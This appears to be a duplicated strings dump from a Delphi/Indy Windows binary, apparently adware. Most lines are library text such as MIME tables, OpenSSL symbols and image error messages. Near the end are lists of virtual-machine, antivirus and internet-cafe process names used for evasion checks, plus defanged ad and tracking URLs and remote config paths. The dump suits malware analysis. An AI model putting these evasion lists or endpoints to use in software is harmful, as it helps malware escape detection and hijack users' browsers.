getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
MSWSOCK.DLL
MSWSOCK.DLL
WSARecvMsg
WSARecvMsg
WSASendMsg
WSASendMsg
Wship6.dll
Wship6.dll
Fwpuclnt.dll
Fwpuclnt.dll
127.0.0.1
127.0.0.1
C:\Builds\TP\indysockets\lib\System\IdStack.pas
C:\Builds\TP\indysockets\lib\System\IdStack.pas
255.255.255.255
255.255.255.255
C:\Builds\TP\indysockets\lib\Core\IdIOHandler.pas
C:\Builds\TP\indysockets\lib\Core\IdIOHandler.pas
0.0.0.0
0.0.0.0
0.0.0.1
0.0.0.1
C:\Builds\TP\indysockets\lib\Core\IdIOHandlerStack.pas
C:\Builds\TP\indysockets\lib\Core\IdIOHandlerStack.pas
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
.nml=animation/narrative
.nml=animation/narrative
.aiff=audio/x-aiff
.aiff=audio/x-aiff
.au=audio/basic
.au=audio/basic
.mid=midi/mid
.mid=midi/mid
.mp3=audio/x-mpg
.mp3=audio/x-mpg
.m3u=audio/x-mpegurl
.m3u=audio/x-mpegurl
.qcp=audio/vnd.qcelp
.qcp=audio/vnd.qcelp
.ra=audio/x-realaudio
.ra=audio/x-realaudio
.wav=audio/x-wav
.wav=audio/x-wav
.gsm=audio/x-gsm
.gsm=audio/x-gsm
.wax=audio/x-ms-wax
.wax=audio/x-ms-wax
.wma=audio/x-ms-wma
.wma=audio/x-ms-wma
.ram=audio/x-pn-realaudio
.ram=audio/x-pn-realaudio
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.bmp=image/bmp
.bmp=image/bmp
.gif=image/gif
.gif=image/gif
.jpg=image/jpeg
.jpg=image/jpeg
.jpeg=image/jpeg
.jpeg=image/jpeg
.jpe=image/jpeg
.jpe=image/jpeg
.pict=image/x-pict
.pict=image/x-pict
.png=image/x-png
.png=image/x-png
.svg=image/svg-xml
.svg=image/svg-xml
.tif=image/x-tiff
.tif=image/x-tiff
.rf=image/vnd.rn-realflash
.rf=image/vnd.rn-realflash
.rp=image/vnd.rn-realpix
.rp=image/vnd.rn-realpix
.ico=image/x-icon
.ico=image/x-icon
.art=image/x-jg
.art=image/x-jg
.pntg=image/x-macpaint
.pntg=image/x-macpaint
.qtif=image/x-quicktime
.qtif=image/x-quicktime
.sgi=image/x-sgi
.sgi=image/x-sgi
.targa=image/x-targa
.targa=image/x-targa
.xbm=image/xbm
.xbm=image/xbm
.psd=image/x-psd
.psd=image/x-psd
.pnm=image/x-portable-anymap
.pnm=image/x-portable-anymap
.pbm=image/x-portable-bitmap
.pbm=image/x-portable-bitmap
.pgm=image/x-portable-graymap
.pgm=image/x-portable-graymap
.ppm=image/x-portable-pixmap
.ppm=image/x-portable-pixmap
.rgb=image/x-rgb
.rgb=image/x-rgb
.xbm=image/x-xbitmap
.xbm=image/x-xbitmap
.xpm=image/x-xpixmap
.xpm=image/x-xpixmap
.xwd=image/x-xwindowdump
.xwd=image/x-xwindowdump
.xml=text/xml
.xml=text/xml
.uls=text/iuls
.uls=text/iuls
.txt=text/plain
.txt=text/plain
.rtx=text/richtext
.rtx=text/richtext
.wsc=text/scriptlet
.wsc=text/scriptlet
.rt=text/vnd.rn-realtext
.rt=text/vnd.rn-realtext
.htt=text/webviewhtml
.htt=text/webviewhtml
.htc=text/x-component
.htc=text/x-component
.vcf=text/x-vcard
.vcf=text/x-vcard
.avi=video/x-msvideo
.avi=video/x-msvideo
.flc=video/flc
.flc=video/flc
.mp2=video/mpeg
.mp2=video/mpeg
.mp3=video/mpeg
.mp3=video/mpeg
.mp4=video/mpeg
.mp4=video/mpeg
.mpeg=video/x-mpeg2a
.mpeg=video/x-mpeg2a
.mpa=video/mpeg
.mpa=video/mpeg
.mpe=video/mpeg
.mpe=video/mpeg
.mpg=video/mpeg
.mpg=video/mpeg
.mov=video/quicktime
.mov=video/quicktime
.rv=video/vnd.rn-realvideo
.rv=video/vnd.rn-realvideo
.ivf=video/x-ivf
.ivf=video/x-ivf
.wm=video/x-ms-wm
.wm=video/x-ms-wm
.wmp=video/x-ms-wmp
.wmp=video/x-ms-wmp
.wmv=video/x-ms-wmv
.wmv=video/x-ms-wmv
.wmx=video/x-ms-wmx
.wmx=video/x-ms-wmx
.wvx=video/x-ms-wvx
.wvx=video/x-ms-wvx
.rms=video/vnd.rn-realvideo-secure
.rms=video/vnd.rn-realvideo-secure
.asx=video/x-ms-asf-plugin
.asx=video/x-ms-asf-plugin
.movie=video/x-sgi-movie
.movie=video/x-sgi-movie
.aab=application/x-authorware-bin
.aab=application/x-authorware-bin
.aam=application/x-authorware-map
.aam=application/x-authorware-map
.aas=application/x-authorware-seg
.aas=application/x-authorware-seg
.abw=application/x-abiword
.abw=application/x-abiword
.ai=application/postscript
.ai=application/postscript
.arj=application/x-arj
.arj=application/x-arj
.asf=application/vnd.ms-asf
.asf=application/vnd.ms-asf
.bat=application/x-msdos-program
.bat=application/x-msdos-program
.bcpio=application/x-bcpio
.bcpio=application/x-bcpio
.bz2=application/x-bzip2
.bz2=application/x-bzip2
.cab=application/vnd.ms-cab-compressed
.cab=application/vnd.ms-cab-compressed
.cat=application/vnd.ms-pki.seccat
.cat=application/vnd.ms-pki.seccat
.ccn=application/x-cnc
.ccn=application/x-cnc
.cco=application/x-cocoa
.cco=application/x-cocoa
.cdf=application/x-cdf
.cdf=application/x-cdf
.cer=application/x-x509-ca-cert
.cer=application/x-x509-ca-cert
.chm=application/vnd.ms-htmlhelp
.chm=application/vnd.ms-htmlhelp
.chrt=application/vnd.kde.kchart
.chrt=application/vnd.kde.kchart
.cil=application/vnd.ms-artgalry
.cil=application/vnd.ms-artgalry
.class=application/java-vm
.class=application/java-vm
.com=application/x-msdos-program
.com=application/x-msdos-program
.clp=application/x-msclip
.clp=application/x-msclip
.cpio=application/x-cpio
.cpio=application/x-cpio
.cpt=application/mac-compactpro
.cpt=application/mac-compactpro
.cqk=application/x-calquick
.cqk=application/x-calquick
.crd=application/x-mscardfile
.crd=application/x-mscardfile
.crl=application/pkix-crl
.crl=application/pkix-crl
.csh=application/x-csh
.csh=application/x-csh
.dbf=application/x-dbase
.dbf=application/x-dbase
.dcr=application/x-director
.dcr=application/x-director
.deb=application/x-debian-package
.deb=application/x-debian-package
.dir=application/x-director
.dir=application/x-director
.dist=vnd.apple.installer xml
.dist=vnd.apple.installer xml
.distz=vnd.apple.installer xml
.distz=vnd.apple.installer xml
.dll=application/x-msdos-program
.dll=application/x-msdos-program
.dmg=application/x-apple-diskimage
.dmg=application/x-apple-diskimage
.doc=application/msword
.doc=application/msword
.dot=application/msword
.dot=application/msword
.dvi=application/x-dvi
.dvi=application/x-dvi
.dxr=application/x-director
.dxr=application/x-director
.ebk=application/x-expandedbook
.ebk=application/x-expandedbook
.eps=application/postscript
.eps=application/postscript
.evy=application/envoy
.evy=application/envoy
.exe=application/x-msdos-program
.exe=application/x-msdos-program
.fdf=application/vnd.fdf
.fdf=application/vnd.fdf
.fif=application/fractals
.fif=application/fractals
.flm=application/vnd.kde.kivio
.flm=application/vnd.kde.kivio
.fml=application/x-file-mirror-list
.fml=application/x-file-mirror-list
.gnumeric=application/x-gnumeric
.gnumeric=application/x-gnumeric
.gtar=application/x-gtar
.gtar=application/x-gtar
.gz=application/x-gzip
.gz=application/x-gzip
.hdf=application/x-hdf
.hdf=application/x-hdf
.hlp=application/winhlp
.hlp=application/winhlp
.hpf=application/x-icq-hpf
.hpf=application/x-icq-hpf
.hqx=application/mac-binhex40
.hqx=application/mac-binhex40
.hta=application/hta
.hta=application/hta
.ims=application/vnd.ms-ims
.ims=application/vnd.ms-ims
.ins=application/x-internet-signup
.ins=application/x-internet-signup
.iii=application/x-iphone
.iii=application/x-iphone
.iso=application/x-iso9660-image
.iso=application/x-iso9660-image
.jar=application/java-archive
.jar=application/java-archive
.karbon=application/vnd.kde.karbon
.karbon=application/vnd.kde.karbon
.kfo=application/vnd.kde.kformula
.kfo=application/vnd.kde.kformula
.kon=application/vnd.kde.kontour
.kon=application/vnd.kde.kontour
.kpr=application/vnd.kde.kpresenter
.kpr=application/vnd.kde.kpresenter
.kpt=application/vnd.kde.kpresenter
.kpt=application/vnd.kde.kpresenter
.kwd=application/vnd.kde.kword
.kwd=application/vnd.kde.kword
.kwt=application/vnd.kde.kword
.kwt=application/vnd.kde.kword
.latex=application/x-latex
.latex=application/x-latex
.lha=application/x-lzh
.lha=application/x-lzh
.lcc=application/fastman
.lcc=application/fastman
.lrm=application/vnd.ms-lrm
.lrm=application/vnd.ms-lrm
.lzh=application/x-lzh
.lzh=application/x-lzh
.mpp=application/vnd.ms-project
.mpp=application/vnd.ms-project
.mvb=application/x-msmediaview
.mvb=application/x-msmediaview
.man=application/x-troff-man
.man=application/x-troff-man
.mdb=application/x-msaccess
.mdb=application/x-msaccess
.me=application/x-troff-me
.me=application/x-troff-me
.ms=application/x-troff-ms
.ms=application/x-troff-ms
.msi=application/x-msi
.msi=application/x-msi
.mpkg=vnd.apple.installer xml
.mpkg=vnd.apple.installer xml
.mny=application/x-msmoney
.mny=application/x-msmoney
.nix=application/x-mix-transfer
.nix=application/x-mix-transfer
.oda=application/oda
.oda=application/oda
.odb=application/vnd.oasis.opendocument.database
.odb=application/vnd.oasis.opendocument.database
.odc=application/vnd.oasis.opendocument.chart
.odc=application/vnd.oasis.opendocument.chart
.odf=application/vnd.oasis.opendocument.formula
.odf=application/vnd.oasis.opendocument.formula
.odg=application/vnd.oasis.opendocument.graphics
.odg=application/vnd.oasis.opendocument.graphics
.odi=application/vnd.oasis.opendocument.image
.odi=application/vnd.oasis.opendocument.image
.odm=application/vnd.oasis.opendocument.text-master
.odm=application/vnd.oasis.opendocument.text-master
.odp=application/vnd.oasis.opendocument.presentation
.odp=application/vnd.oasis.opendocument.presentation
.ods=application/vnd.oasis.opendocument.spreadsheet
.ods=application/vnd.oasis.opendocument.spreadsheet
.ogg=application/ogg
.ogg=application/ogg
.odt=application/vnd.oasis.opendocument.text
.odt=application/vnd.oasis.opendocument.text
.otg=application/vnd.oasis.opendocument.graphics-template
.otg=application/vnd.oasis.opendocument.graphics-template
.oth=application/vnd.oasis.opendocument.text-web
.oth=application/vnd.oasis.opendocument.text-web
.otp=application/vnd.oasis.opendocument.presentation-template
.otp=application/vnd.oasis.opendocument.presentation-template
.ots=application/vnd.oasis.opendocument.spreadsheet-template
.ots=application/vnd.oasis.opendocument.spreadsheet-template
.ott=application/vnd.oasis.opendocument.text-template
.ott=application/vnd.oasis.opendocument.text-template
.p7b=application/x-pkcs7-certificates
.p7b=application/x-pkcs7-certificates
.p7r=application/x-pkcs7-certreqresp
.p7r=application/x-pkcs7-certreqresp
.package=application/vnd.autopackage
.package=application/vnd.autopackage
.pfr=application/font-tdpfr
.pfr=application/font-tdpfr
.pkg=vnd.apple.installer xml
.pkg=vnd.apple.installer xml
.pdf=application/pdf
.pdf=application/pdf
.pko=application/vnd.ms-pki.pko
.pko=application/vnd.ms-pki.pko
.pl=application/x-perl
.pl=application/x-perl
.pnq=application/x-icq-pnq
.pnq=application/x-icq-pnq
.pot=application/mspowerpoint
.pot=application/mspowerpoint
.pps=application/mspowerpoint
.pps=application/mspowerpoint
.ppt=application/mspowerpoint
.ppt=application/mspowerpoint
.ppz=application/mspowerpoint
.ppz=application/mspowerpoint
.ps=application/postscript
.ps=application/postscript
.pub=application/x-mspublisher
.pub=application/x-mspublisher
.qpw=application/x-quattropro
.qpw=application/x-quattropro
.qtl=application/x-quicktimeplayer
.qtl=application/x-quicktimeplayer
.rar=application/rar
.rar=application/rar
.rdf=application/rdf xml
.rdf=application/rdf xml
.rjs=application/vnd.rn-realsystem-rjs
.rjs=application/vnd.rn-realsystem-rjs
.rm=application/vnd.rn-realmedia
.rm=application/vnd.rn-realmedia
.rmf=application/vnd.rmf
.rmf=application/vnd.rmf
.rmp=application/vnd.rn-rn_music_package
.rmp=application/vnd.rn-rn_music_package
.rmx=application/vnd.rn-realsystem-rmx
.rmx=application/vnd.rn-realsystem-rmx
.rnx=application/vnd.rn-realplayer
.rnx=application/vnd.rn-realplayer
.rpm=application/x-redhat-package-manager
.rpm=application/x-redhat-package-manager
.rsml=application/vnd.rn-rsml
.rsml=application/vnd.rn-rsml
.rtsp=application/x-rtsp
.rtsp=application/x-rtsp
.rss=application/rss xml
.rss=application/rss xml
.scm=application/x-icq-scm
.scm=application/x-icq-scm
.ser=application/java-serialized-object
.ser=application/java-serialized-object
.sh=application/x-sh
.sh=application/x-sh
.shar=application/x-shar
.shar=application/x-shar
.scd=application/x-msschedule
.scd=application/x-msschedule
.sda=application/vnd.stardivision.draw
.sda=application/vnd.stardivision.draw
.sdc=application/vnd.stardivision.calc
.sdc=application/vnd.stardivision.calc
.sdd=application/vnd.stardivision.impress
.sdd=application/vnd.stardivision.impress
.sdp=application/x-sdp
.sdp=application/x-sdp
.setpay=application/set-payment-initiation
.setpay=application/set-payment-initiation
.setreg=application/set-registration-initiation
.setreg=application/set-registration-initiation
.shw=application/presentations
.shw=application/presentations
.sit=application/x-stuffit
.sit=application/x-stuffit
.skd=application/x-koan
.skd=application/x-koan
.skm=application/x-koan
.skm=application/x-koan
.skp=application/x-koan
.skp=application/x-koan
.skt=application/x-koan
.skt=application/x-koan
.smf=application/vnd.stardivision.math
.smf=application/vnd.stardivision.math
.smi=application/smil
.smi=application/smil
.smil=application/smil
.smil=application/smil
.spl=application/futuresplash
.spl=application/futuresplash
.ssm=application/streamingmedia
.ssm=application/streamingmedia
.sst=application/vnd.ms-pki.certstore
.sst=application/vnd.ms-pki.certstore
.stc=application/vnd.sun.xml.calc.template
.stc=application/vnd.sun.xml.calc.template
.std=application/vnd.sun.xml.draw.template
.std=application/vnd.sun.xml.draw.template
.sti=application/vnd.sun.xml.impress.template
.sti=application/vnd.sun.xml.impress.template
.stl=application/vnd.ms-pki.stl
.stl=application/vnd.ms-pki.stl
.stw=application/vnd.sun.xml.writer.template
.stw=application/vnd.sun.xml.writer.template
.svi=application/softvision
.svi=application/softvision
.sv4cpio=application/x-sv4cpio
.sv4cpio=application/x-sv4cpio
.sv4crc=application/x-sv4crc
.sv4crc=application/x-sv4crc
.swf=application/x-shockwave-flash
.swf=application/x-shockwave-flash
.sxc=application/vnd.sun.xml.calc
.sxc=application/vnd.sun.xml.calc
.sxi=application/vnd.sun.xml.impress
.sxi=application/vnd.sun.xml.impress
.sxm=application/vnd.sun.xml.math
.sxm=application/vnd.sun.xml.math
.sxw=application/vnd.sun.xml.writer
.sxw=application/vnd.sun.xml.writer
.sxg=application/vnd.sun.xml.writer.global
.sxg=application/vnd.sun.xml.writer.global
.tar=application/x-tar
.tar=application/x-tar
.tcl=application/x-tcl
.tcl=application/x-tcl
.tex=application/x-tex
.tex=application/x-tex
.texi=application/x-texinfo
.texi=application/x-texinfo
.texinfo=application/x-texinfo
.texinfo=application/x-texinfo
.tr=application/x-troff
.tr=application/x-troff
.trm=application/x-msterminal
.trm=application/x-msterminal
.troff=application/x-troff
.troff=application/x-troff
.tsp=application/dsptype
.tsp=application/dsptype
.tgz=application/x-compressed
.tgz=application/x-compressed
.torrent=application/x-bittorrent
.torrent=application/x-bittorrent
.ttz=application/t-time
.ttz=application/t-time
.uin=application/x-icq
.uin=application/x-icq
.urls=application/x-url-list
.urls=application/x-url-list
.ustar=application/x-ustar
.ustar=application/x-ustar
.vcd=application/x-cdlink
.vcd=application/x-cdlink
.vor=application/vnd.stardivision.writer
.vor=application/vnd.stardivision.writer
.vsl=application/x-cnet-vsl
.vsl=application/x-cnet-vsl
.wcm=application/vnd.ms-works
.wcm=application/vnd.ms-works
.wb1=application/x-quattropro
.wb1=application/x-quattropro
.wb2=application/x-quattropro
.wb2=application/x-quattropro
.wb3=application/x-quattropro
.wb3=application/x-quattropro
.wdb=application/vnd.ms-works
.wdb=application/vnd.ms-works
.wks=application/vnd.ms-works
.wks=application/vnd.ms-works
.wmd=application/x-ms-wmd
.wmd=application/x-ms-wmd
.wms=application/x-ms-wms
.wms=application/x-ms-wms
.wmz=application/x-ms-wmz
.wmz=application/x-ms-wmz
.wp5=application/wordperfect5.1
.wp5=application/wordperfect5.1
.wpd=application/wordperfect
.wpd=application/wordperfect
.wpl=application/vnd.ms-wpl
.wpl=application/vnd.ms-wpl
.wps=application/vnd.ms-works
.wps=application/vnd.ms-works
.wri=application/x-mswrite
.wri=application/x-mswrite
.xfdf=application/vnd.adobe.xfdf
.xfdf=application/vnd.adobe.xfdf
.xls=application/x-msexcel
.xls=application/x-msexcel
.xlb=application/x-msexcel
.xlb=application/x-msexcel
.xpi=application/x-xpinstall
.xpi=application/x-xpinstall
.xps=application/vnd.ms-xpsdocument
.xps=application/vnd.ms-xpsdocument
.xsd=application/vnd.sun.xml.draw
.xsd=application/vnd.sun.xml.draw
.xul=application/vnd.mozilla.xul xml
.xul=application/vnd.mozilla.xul xml
.zoo=application/x-zoo
.zoo=application/x-zoo
.zip=application/x-zip-compressed
.zip=application/x-zip-compressed
.wbmp=image/vnd.wap.wbmp
.wbmp=image/vnd.wap.wbmp
.wml=text/vnd.wap.wml
.wml=text/vnd.wap.wml
.wmlc=application/vnd.wap.wmlc
.wmlc=application/vnd.wap.wmlc
.wmls=text/vnd.wap.wmlscript
.wmls=text/vnd.wap.wmlscript
.wmlsc=application/vnd.wap.wmlscriptc
.wmlsc=application/vnd.wap.wmlscriptc
.pas=text/x-pascal
.pas=text/x-pascal
.hpp=text/x-c hdr
.hpp=text/x-c hdr
.hxx=text/x-c hdr
.hxx=text/x-c hdr
.hh=text/x-c hdr
.hh=text/x-c hdr
.cpp=text/x-c src
.cpp=text/x-c src
.cxx=text/x-c src
.cxx=text/x-c src
.cc=text/x-c src
.cc=text/x-c src
.java=text/x-java
.java=text/x-java
.css=text/css
.css=text/css
.js=text/javascript
.js=text/javascript
.htm=text/html
.htm=text/html
.html=text/html
.html=text/html
.ls=text/javascript
.ls=text/javascript
.mocha=text/javascript
.mocha=text/javascript
.shtml=server-parsed-html
.shtml=server-parsed-html
.sgm=text/sgml
.sgm=text/sgml
.sgml=text/sgml
.sgml=text/sgml
C:\Builds\TP\indysockets\lib\Protocols\IdGlobalProtocols.pas
C:\Builds\TP\indysockets\lib\Protocols\IdGlobalProtocols.pas
()@,;:\"/[]?=
()@,;:\"/[]?=
()@,;:\"/[]?=
()@,;:\"/[]?=
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Type: %s
Content-Type: %s
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
*#% []
*#% []
*#% []
*#% []
HTTPS
HTTPS
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length exceeded (expected
C:\Builds\TP\indysockets\lib\Protocols\IdCoder3to4.pas
C:\Builds\TP\indysockets\lib\Protocols\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
HttpOnly
HttpOnly
HTTPONLY
HTTPONLY
port
port
COMMENTURL
COMMENTURL
PORT
PORT
.local
.local
C:\Builds\TP\indysockets\lib\Protocols\IdZLibCompressorBase.pas
C:\Builds\TP\indysockets\lib\Protocols\IdZLibCompressorBase.pas
C:\Builds\TP\indysockets\lib\Core\IdThread.pas
C:\Builds\TP\indysockets\lib\Core\IdThread.pas
C:\Builds\TP\indysockets\lib\Core\IdScheduler.pas
C:\Builds\TP\indysockets\lib\Core\IdScheduler.pas
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
%d%s%d
%d%s%d
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSLHeaders.pas
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSLHeaders.pas
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
libssl32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
DES_set_key
DES_set_key
_ossl_old_des_set_key
_ossl_old_des_set_key
des_set_key
des_set_key
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
i2d_PrivateKey_bio
i2d_PrivateKey_bio
X509_set_pubkey
X509_set_pubkey
X509_REQ_set_pubkey
X509_REQ_set_pubkey
PEM_write_bio_PKCS8PrivateKey
PEM_write_bio_PKCS8PrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_PrivateKey
EVP_PKEY_type
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_free
EVP_PKEY_assign
EVP_PKEY_assign
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSL.pas
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSL.pas
C:\Builds\TP\indysockets\lib\Protocols\IdHTTP.pas
C:\Builds\TP\indysockets\lib\Protocols\IdHTTP.pas
application/x-www-form-urlencoded
application/x-www-form-urlencoded
https
https
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
Mozilla/5.0
Mozilla/5.0
00-00-00-00-00-00
00-00-00-00-00-00
VBoxService.exe
VBoxService.exe
ShadowTip.exe
ShadowTip.exe
PowerRemind.exe
PowerRemind.exe
ShadowService.exe
ShadowService.exe
AliYunDun.exe
AliYunDun.exe
vmtoolsd.exe
vmtoolsd.exe
wanxiang.exe
wanxiang.exe
pubwin.exe
pubwin.exe
yaoqianshu.exe
yaoqianshu.exe
UKeyMain.exe
UKeyMain.exe
clientmo.exe
clientmo.exe
Jfwclient.exe
Jfwclient.exe
ssp.exe
ssp.exe
mpclient.exe
mpclient.exe
fzclient.exe
fzclient.exe
TLnbLdr.exe
TLnbLdr.exe
yqsclient.exe
yqsclient.exe
barrms.exe
barrms.exe
clsmn.exe
clsmn.exe
RzxMon.exe
RzxMon.exe
rzxsvr.exe
rzxsvr.exe
UDO.exe
UDO.exe
duduniu.exe
duduniu.exe
BarClientView.exe
BarClientView.exe
/paramfile/main.txt
/paramfile/main.txt
360Tray.exe
360Tray.exe
QQPCTray.exe
QQPCTray.exe
/detail.ashx
/detail.ashx
/bestcount.ashx
/bestcount.ashx
/newcount.aspx
/newcount.aspx
/will.html
/will.html
hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
hXXp://VVV.91debug.com/ad.html
hXXp://VVV.91debug.com/ad.html
hXXp://jc.110160.com/ad.htm
hXXp://jc.110160.com/ad.htm
/paramfile/navweb.txt
/paramfile/navweb.txt
/paramfile/desktoplnk.txt
/paramfile/desktoplnk.txt
firefox
firefox
chrome
chrome
opera
opera
hXXp://jc.110160.com
hXXp://jc.110160.com
\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Kernel32.dll
Kernel32.dll
Open SSL Support DLL Delphi and C Builder interface
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
hXXp://VVV.indyproject.org/
1993 - 2009
1993 - 2009
Portable Network Graphics
Portable Network Graphics
hXXp://tj.sui17.com
hXXp://tj.sui17.com
/paramfile/tasklist.txt
/paramfile/tasklist.txt
/IsNoInstall.ashx
/IsNoInstall.ashx
ymeta.dat
ymeta.dat
cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.oSome operation could not be performed because the system is out of resources. Close some windows and try again.
cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.oSome operation could not be performed because the system is out of resources. Close some windows and try again.
Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.
Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.
Unsupported operation.&Cannot change the size of a JPEG image
Unsupported operation.&Cannot change the size of a JPEG image
JPEG error #%d
JPEG error #%d
JPEG Image FilejThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
JPEG Image FilejThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.
The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.
Error creating SSL context. Could not load root certificate.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"pUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.
SSL status: "%s"pUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.
$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.
$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.
Reply Code is not valid: %s
Reply Code is not valid: %s
Reply Code already exists: %s
Reply Code already exists: %s
Unknown Protocol(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.KUnsupported hash algorithm. This implementation supports only MD5 encoding.
Unknown Protocol(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.KUnsupported hash algorithm. This implementation supports only MD5 encoding.
File "%s" not found
File "%s" not found
Object type not supported.
Object type not supported.
Transparent proxy cannot bind. UDP Not supported by this proxy.QRequest rejected because the client program and identd report different user-ids.
Transparent proxy cannot bind. UDP Not supported by this proxy.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid service.
